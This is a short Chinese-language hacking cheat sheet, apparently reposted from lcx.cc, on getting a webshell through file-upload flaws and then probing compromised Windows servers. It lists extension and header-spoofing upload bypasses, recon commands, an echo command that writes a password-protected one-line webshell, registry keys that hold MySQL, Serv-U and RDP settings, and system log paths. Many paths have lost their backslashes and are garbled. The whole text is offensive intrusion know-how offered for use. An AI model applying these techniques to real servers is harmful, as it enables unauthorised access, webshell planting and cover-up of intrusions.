上传漏洞拿shell:
1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马,拿到shell.
2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。
3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。
4.gif文件头欺骗
5.同名重复上传也很OK。:
入侵渗透中用到的命令,语法:
set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息
tasklist /svc 查看 服务对应的pid
netstat -ano,netstat -abnv
fsutil.exe fsinfo drives 列出全部盘符
dir d:*conn*.* /s 找数据库连接文件
telnet 218.25.88.234 3389 对外部是否开放了这个端口
echo ^ >>e:kX.asp 写一句话到e:k目录,密码为cmd.
type d:wwwrootwebk6.asp >d:wwwroot123a.asp 传送d:wwwrootweb下的k6.asp到d:wwwroot123重命名为a.asp
注册表敏感信息:
HKEY_LOCAL_MACHINESOFTWAREMySQL AB mysql 注册表位置
HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG 华众主机位置
HKEY_LOCAL_MACHINESOFTWAREcat softserv-u serv-u 位置
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcpPortNamber 3389端口
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpipParameters 1433端口
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesMSFtpsvcParametersVirtual Roots 服务器ftp路径
服务器日志文件物理路径:
安全日志文件:%systemroot%system32config SecEvent.EVT
系统日志文件:%systemroot%system32config SysEvent.EVT
应用程序日志文件:%systemroot%system32config AppEvent.EVT
FTP连接日志和HTTPD事务日志:systemroot% system32LogFiles,下面还有子文件夹,分别对应该FTP和Web服务的日志,其对应的后缀名为.Log。
诺顿杀毒日志:C:Documents and SettingsAll UsersApplication DataSymantec
本人收集整理,文中有错的地方,请大家指出。
文章来源于lcx.cc:入侵渗透中用到的一些技巧和思路
相关推荐: 超过16W的WordPress网站被用来做DDoS攻击
任何开启了Pingback(默认就开启)的WordPress的站点可以被用来做DDOS攻击其它服务器。 看如下日志: 74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 H…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论